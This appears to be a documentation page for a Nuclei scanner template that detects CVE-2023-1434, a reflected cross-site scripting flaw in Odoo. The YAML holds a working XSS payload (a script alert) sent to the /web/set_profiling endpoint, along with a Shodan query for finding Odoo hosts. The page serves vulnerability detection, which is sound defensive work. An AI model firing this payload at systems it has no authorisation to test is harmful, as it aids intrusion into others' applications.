Odoo - Cross-Site Scripting
ID: CVE-2023-1434
Severity: medium
Author: DhiyaneshDK
Tags: cve2023,cve,odoo,xss
Description
Section titled “Description”Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint.
YAML Source
Section titled “YAML Source”id: CVE-2023-1434
info: name: Odoo - Cross-Site Scripting author: DhiyaneshDK severity: medium description: | Odoo is a business suite that has features for many business-critical areas, such as e-commerce, billing, or CRM. Versions before the 16.0 release are vulnerable to CVE-2023-1434 and is caused by an incorrect content type being set on an API endpoint. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or updates provided by the vendor to fix this vulnerability. reference: - https://www.sonarsource.com/blog/odoo-get-your-content-type-right-or-else - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-1434 classification: cve-id: CVE-2023-1434 cwe-id: CWE-79 cpe: cpe:2.3:a:odoo:odoo:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 shodan-query: title:"Odoo" product: odoo vendor: odoo tags: cve2023,cve,odoo,xss
http: - method: GET path: - "{{BaseURL}}/web/set_profiling?profile=0&collectors=<script>alert(document.domain)</script>"
matchers-condition: and matchers: - type: word part: body words: - '<script>alert(document.domain)</script>' - '"params":' - 'session' condition: and
- type: word part: header words: - "text/html"
- type: status status: - 200# digest: 490a00463044022028f83c1db0c22e6cc7b21dbf4c97bdccc89ff000207ff0c3460e170edc42b8ef0220363ef8137aa1e30806e545309b850d6634dc826c341a18a35894e193fcc42fb0:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2023/CVE-2023-1434.yaml"